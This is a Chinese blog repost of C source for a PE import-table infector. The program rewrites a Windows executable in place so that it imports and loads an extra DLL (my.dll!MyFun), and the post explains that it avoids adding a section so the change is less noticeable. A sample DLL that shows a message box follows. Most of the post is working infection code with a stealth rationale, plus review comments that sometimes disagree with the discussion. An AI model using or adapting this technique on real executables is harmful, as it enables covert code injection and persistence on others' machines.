
分类: WINDOWS

2012-03-21 22:25:09

[原创]发一段感染引入表的vc代码 信息来源:邪恶八进制信息安全团队()
文章作者:[E.S.T] 认真的雪


#include <stdio.h>
#include <string.h>
#include <windows.h>

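DWORD RVAToOffset(LPVOID lpBase,DWORD VirtualAddress)
{
    /* Map an RVA to a file offset by finding the section whose raw data
     * covers it.  Returns 0 when no section covers the RVA; 0 cannot be a
     * valid answer here because file offset 0 holds the DOS header, never
     * section data.
     *
     * The caller is expected to have checked e_magic / Signature already.
     * This routine does not bounds-check e_lfanew or NumberOfSections against
     * the size of the mapping, so a malformed file can still make it read
     * outside the view. */
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER*)lpBase;
    IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS*)((BYTE*)lpBase + dosHeader->e_lfanew);
    /* IMAGE_FIRST_SECTION uses FileHeader.SizeOfOptionalHeader, so it finds
     * the section table for any optional-header size; sizeof(IMAGE_NT_HEADERS)
     * is only right when the file's optional header matches the bitness this
     * tool happens to be built for. */
    IMAGE_SECTION_HEADER *section = IMAGE_FIRST_SECTION(ntHeader);
    WORD numOfSections = ntHeader->FileHeader.NumberOfSections;
    WORD idx;

    for (idx = 0; idx < numOfSections; idx++, section++) {
        DWORD sectionStart = section->VirtualAddress;
        /* Inclusive lower bound: an RVA exactly at the start of a section (a
         * directory placed first in .idata/.rdata is common) belongs to that
         * section; the original '>' rejected it and returned 0.  The
         * subtraction form cannot wrap the way VirtualAddress + SizeOfRawData
         * could for a bogus header. */
        if (VirtualAddress >= sectionStart &&
            VirtualAddress - sectionStart < section->SizeOfRawData) {
            return section->PointerToRawData + (VirtualAddress - sectionStart);
        }
    }
    return 0;
}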

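int sectionNum(LPVOID lpBase,DWORD VirtualAddress)
{
    /* 0-based index of the section whose raw data covers the RVA, or -1 when
     * none does.  Performs the same search as RVAToOffset so the two agree on
     * which section an RVA belongs to.  As there, the headers are assumed to
     * have been validated by the caller and are not bounds-checked here. */
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER*)lpBase;
    IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS*)((BYTE*)lpBase + dosHeader->e_lfanew);
    /* Section table starts after an optional header of whatever size the
     * file declares, not after sizeof(IMAGE_NT_HEADERS). */
    IMAGE_SECTION_HEADER *section = IMAGE_FIRST_SECTION(ntHeader);
    int numOfSections = ntHeader->FileHeader.NumberOfSections;
    int idx;

    for (idx = 0; idx < numOfSections; idx++, section++) {
        DWORD sectionStart = section->VirtualAddress;
        /* Inclusive lower bound: an RVA equal to VirtualAddress is inside the
         * section.  The original '>' returned -1 for an import directory that
         * sits at the very start of its section. */
        if (VirtualAddress >= sectionStart &&
            VirtualAddress - sectionStart < section->SizeOfRawData) {
            return idx;
        }
    }
    return -1;
}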


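int main(int argc, char* argv[])
{
    /* Add one import (my.dll!MyFun) to a PE32 executable in place.
     *
     * The existing import descriptor array is copied into the unused tail of
     * the section that holds it (the raw bytes between Misc.VirtualSize and
     * SizeOfRawData), followed by one new descriptor, the terminating null
     * descriptor, the DLL name, an import name table, an import address
     * table and the hint/name entry.  The import data directory is then
     * pointed at the copy.  No section is added and the file size does not
     * change, which is why the author chose this layout (see the discussion
     * below the listing).
     *
     * argv[1]: path of the file to modify (opened read/write, exclusive).
     * Returns 0 on success and 1 on any failure; every failure path releases
     * the view, the mapping and the file handle.
     *
     * Limitations: PE32 only (the thunks written here are 4 bytes wide) and
     * the file must already have an import table.
     *
     * NOTE(review): the bound-import directory and the IAT directory entry
     * are left untouched.  If the loader limits its write-enable of the IAT
     * to the range the IAT directory describes, a new IAT placed outside it
     * in a read-only section may fail to load -- verify on the target OS.
     */
    enum { DESC_SIZE = sizeof(IMAGE_IMPORT_DESCRIPTOR) };   /* 20 bytes */
    static const char dllName[] = "my.dll";
    static const char funName[] = "MyFun";

    int rc = 1;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hMap = NULL;
    LPVOID lpBase = NULL;
    WORD hint = 0;
    DWORD fileSize;
    DWORD sectionTableEnd;
    DWORD sectAlign;
    IMAGE_DOS_HEADER *dosHeader;
    IMAGE_NT_HEADERS32 *ntHeader;
    IMAGE_SECTION_HEADER *sectionHeader;
    IMAGE_IMPORT_DESCRIPTOR *oldImports;
    IMAGE_IMPORT_DESCRIPTOR newDesc;
    DWORD importRva, importOffset, sectionEnd;
    DWORD oldCount;
    DWORD virtualSize, slack, start, pad, mappedEnd;
    DWORD nameSlot, thunkSlot, hintSlot, needed;
    DWORD outRva, nameRva, intRva, iatRva, hintRva;
    DWORD thunk[2];
    BYTE *out;
    int ncout;

    if (argc < 2) {
        printf("usage: %s <pe-file>\n", argv[0] ? argv[0] : "program");
        return 1;
    }

    hFile = CreateFile(argv[1], GENERIC_READ | GENERIC_WRITE, 0, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("CreateFile Failed\n");
        return 1;
    }

    /* The input is untrusted: bound every header access below by the file size. */
    fileSize = GetFileSize(hFile, NULL);
    if (fileSize == INVALID_FILE_SIZE || fileSize < sizeof(IMAGE_NT_HEADERS32)) {
        printf("file too small\n");
        goto cleanup;
    }

    /* CreateFileMapping reports failure with NULL, not INVALID_HANDLE_VALUE;
     * the original comparison could never fire. */
    hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    if (hMap == NULL) {
        printf("CreateFileMapping Failed\n");
        goto cleanup;
    }

    lpBase = MapViewOfFile(hMap, FILE_MAP_WRITE, 0, 0, 0);
    if (lpBase == NULL) {
        printf("MapViewOfFile Failed\n");
        goto cleanup;
    }

    dosHeader = (IMAGE_DOS_HEADER*)lpBase;
    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        printf("This is not a windows file\n");
        goto cleanup;
    }
    if (dosHeader->e_lfanew < 0 ||
        (DWORD)dosHeader->e_lfanew > fileSize - sizeof(IMAGE_NT_HEADERS32)) {
        printf("NT headers outside file\n");
        goto cleanup;
    }

    ntHeader = (IMAGE_NT_HEADERS32*)((BYTE*)lpBase + dosHeader->e_lfanew);
    if (ntHeader->Signature != IMAGE_NT_SIGNATURE) {
        printf("This is not a win32 file\n");
        goto cleanup;
    }
    /* The thunks written below are 32-bit; a PE32+ image needs 64-bit ones. */
    if (ntHeader->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
        printf("only PE32 images are supported\n");
        goto cleanup;
    }
    /* The section table must lie inside the file before the helpers walk it. */
    sectionTableEnd = (DWORD)dosHeader->e_lfanew
                    + FIELD_OFFSET(IMAGE_NT_HEADERS32, OptionalHeader)
                    + ntHeader->FileHeader.SizeOfOptionalHeader
                    + (DWORD)ntHeader->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
    if (sectionTableEnd > fileSize) {
        printf("section table outside file\n");
        goto cleanup;
    }
    sectAlign = ntHeader->OptionalHeader.SectionAlignment;

    importRva = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    if (importRva == 0) {
        printf("file has no import table\n");
        goto cleanup;
    }
    ncout = sectionNum(lpBase, importRva);
    if (ncout == -1) {
        printf("get section failed\n");
        goto cleanup;
    }
    sectionHeader = IMAGE_FIRST_SECTION(ntHeader) + ncout;

    /* The section's raw data must itself be inside the file. */
    if (sectionHeader->PointerToRawData > fileSize ||
        sectionHeader->SizeOfRawData > fileSize - sectionHeader->PointerToRawData) {
        printf("section raw data outside file\n");
        goto cleanup;
    }
    sectionEnd = sectionHeader->PointerToRawData + sectionHeader->SizeOfRawData;

    /* Free space is the raw data past VirtualSize.  When VirtualSize exceeds
     * SizeOfRawData (a section with an uninitialised tail) there is none; the
     * original computed this difference as a negative int. */
    virtualSize = sectionHeader->Misc.VirtualSize;
    if (virtualSize > sectionHeader->SizeOfRawData) {
        printf("file space is not enough\n");
        goto cleanup;
    }
    slack = sectionHeader->SizeOfRawData - virtualSize;
    printf("%lu\n", (unsigned long)slack);

    importOffset = RVAToOffset(lpBase, importRva);
    if (importOffset < sectionHeader->PointerToRawData || importOffset >= sectionEnd ||
        sectionEnd - importOffset < DESC_SIZE) {
        printf("import table outside its section\n");
        goto cleanup;
    }
    oldImports = (IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase + importOffset);

    /* Count the existing descriptors, stopping at the null terminator as the
     * original did, but never reading past the section's raw data. */
    oldCount = 0;
    while (oldImports[oldCount].FirstThunk != 0) {
        oldCount++;
        if ((sectionEnd - importOffset) / DESC_SIZE <= oldCount) {
            printf("import table is not terminated inside its section\n");
            goto cleanup;
        }
    }

    /* Layout of the rebuilt table, starting at the first DWORD-aligned offset
     * at or past VirtualSize:
     *   (oldCount + 2) descriptors  - the old ones, the new one, the null terminator
     *   nameSlot  bytes             - "my.dll\0", padded to a multiple of 4
     *   thunkSlot bytes             - INT (thunk + null) then IAT (thunk + null)
     *   hintSlot  bytes             - WORD hint followed by "MyFun\0"
     * INT and IAT are separate arrays here; the original pointed
     * OriginalFirstThunk and FirstThunk at one array, so the loader's IAT
     * writes overwrote the name-table entry. */
    start = (virtualSize + 3) & ~(DWORD)3;
    pad = start - virtualSize;
    nameSlot = ((DWORD)sizeof(dllName) + 3) & ~(DWORD)3;
    thunkSlot = 2 * 2 * sizeof(DWORD);
    hintSlot = sizeof(WORD) + (DWORD)sizeof(funName);
    needed = pad + (oldCount + 2) * DESC_SIZE + nameSlot + thunkSlot + hintSlot;
    if (needed > slack) {
        printf("file space is not enough\n");
        goto cleanup;
    }
    /* NOTE(review): bytes past VirtualSize are only visible at run time if
     * they fall inside the pages the loader maps for this section, i.e.
     * below VirtualSize rounded up to SectionAlignment.  Anything beyond
     * that is rejected, and VirtualSize is bumped below so the new table is
     * part of the section's declared extent -- confirm against the loader of
     * the target OS. */
    mappedEnd = sectAlign ? ((virtualSize + sectAlign - 1) / sectAlign) * sectAlign : virtualSize;
    if (virtualSize + needed > mappedEnd) {
        printf("file space is not enough\n");
        goto cleanup;
    }

    out = (BYTE*)lpBase + sectionHeader->PointerToRawData + start;
    outRva = sectionHeader->VirtualAddress + start;
    nameRva = outRva + (oldCount + 2) * DESC_SIZE;
    intRva = nameRva + nameSlot;
    iatRva = intRva + 2 * sizeof(DWORD);
    hintRva = iatRva + 2 * sizeof(DWORD);
    printf("%lx\n", (unsigned long)(sectionHeader->PointerToRawData + start));
    printf("%lu\n", (unsigned long)DESC_SIZE);

    /* Zero the whole area first: the null descriptor, the name padding and
     * the null thunks then need no separate writes. */
    memset(out, 0, needed - pad);

    /* memmove, not memcpy: the old table lives earlier in the same section and
     * could overlap the destination if VirtualSize is understated. */
    memmove(out, oldImports, oldCount * DESC_SIZE);

    memset(&newDesc, 0, sizeof newDesc);
    /* All three fields are RVAs.  The original built OriginalFirstThunk from
     * PointerToRawData (a file offset), which discussion item 4 flags. */
    newDesc.OriginalFirstThunk = intRva;
    newDesc.TimeDateStamp = 0;
    newDesc.ForwarderChain = 0;
    newDesc.Name = nameRva;
    newDesc.FirstThunk = iatRva;
    memcpy(out + oldCount * DESC_SIZE, &newDesc, DESC_SIZE);
    /* Entry oldCount + 1 stays all-zero: the terminator. */

    memcpy(out + (nameRva - outRva), dllName, sizeof dllName);

    /* Import by name: the thunk is the RVA of the hint/name entry (high bit
     * clear); element 1 stays 0 as the array terminator. */
    thunk[0] = hintRva;
    thunk[1] = 0;
    memcpy(out + (intRva - outRva), thunk, sizeof thunk);
    memcpy(out + (iatRva - outRva), thunk, sizeof thunk);

    /* sizeof funName includes the NUL; the original copied strlen + 2 bytes,
     * reading one byte past the literal and overrunning its space budget. */
    memcpy(out + (hintRva - outRva), &hint, sizeof hint);
    memcpy(out + (hintRva - outRva) + sizeof hint, funName, sizeof funName);

    /* Point the image at the rebuilt table, record its size, and extend the
     * section's declared extent to cover it. */
    ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = outRva;
    ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = (oldCount + 2) * DESC_SIZE;
    sectionHeader->Misc.VirtualSize = virtualSize + needed;

    if (!FlushViewOfFile(lpBase, 0)) {
        printf("FlushViewOfFile Failed\n");
        goto cleanup;
    }
    rc = 0;

cleanup:
    if (lpBase != NULL) {
        UnmapViewOfFile(lpBase);
    }
    if (hMap != NULL) {
        CloseHandle(hMap);
    }
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }
    return rc;
}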



以下是对该代码的一些讨论:
1.  不是在现有引入表结构之后添加一个新的引入表结构滴,而是把原先的的引入表写到引入表所在节的空余空间上,再加上新的引入表结构,一般来说这个长度是足够的,不是前面还做了长度大小的判断吗....加一个新节文件大小改变了,会比较明显哟,所以当时就这么写了....貌似代码是比较乱,见谅了,嘿 嘿.....

2.  if(i*20+20*3+8+8>nullsize)   意思是:判断导入表所在节的末尾的剩余空间,是否足够写入所有的导入表。

3. i*20是原始导入表的大小。。。
那么后面的 20*3+8+8 就是 my.dll 对应的 IMAGE_IMPORT_DESCRIPTOR 结构以及该结构成员所指向数据的大小：20 字节的新描述符、20 字节的全零结束描述符、20 字节存放 "my.dll\0"（只用了 7 字节，其余留空）、8 字节的 thunk 数组（一个 DWORD 项加一个 0 结束项，OriginalFirstThunk 和 FirstThunk 指向同一处）、8 字节的 hint（WORD）加 "MyFun\0"。注意代码里 memcpy 复制了 strlen(funname)+2 个字节，比 "MyFun\0" 多读了一个字节，实际写入 9 字节，比预算多出 1 字节。


4. 发现这段代码还是有问题：myImport.OriginalFirstThunk 那一行把文件偏移 sectionHeader->PointerToRawData 当成了 RVA，应改成 sectionHeader->VirtualAddress（与 FirstThunk、Name 两行保持一致），这样 OriginalFirstThunk 才是正确的 RVA。

5. 用 PE 查看工具或 Dependency Walker 确认 my.dll 导出的函数名确实是 MyFun，
    而不是 "_MyFun@所有参数的字节数" 这种经过修饰的形式（被感染文件是按名字 "MyFun" 导入的，名字不一致加载就会失败）。
   对于用 VC 编译的 DLL，最好按下面的方式声明函数（extern "C" 关闭 C++ 的名字修饰）:
  ------>.h
 #ifdef MYDLL                                /* presumably defined by the DLL project itself -- confirm */
#define DLLFUN   _declspec(dllexport)        /* building my.dll: export the symbol */
#else
#define DLLFUN   _declspec(dllimport)        /* any client build: import it */
#endif

#ifdef __cplusplus
extern "C" {                                 /* no C++ name mangling: the export must be literally "MyFun", the name the patched image imports */
#endif

DLLFUN  void MyFun();

#ifdef __cplusplus
}
#endif

  ------>.cpp
DLLFUN  void MyFun()
{
    /* The exported entry the patched image imports by name.  It only pops a
     * message box and returns; nothing is computed or returned. */
    const UINT flags = MB_OK;
    MessageBox(NULL, "just to do it , my boy", "hahahah", flags);
}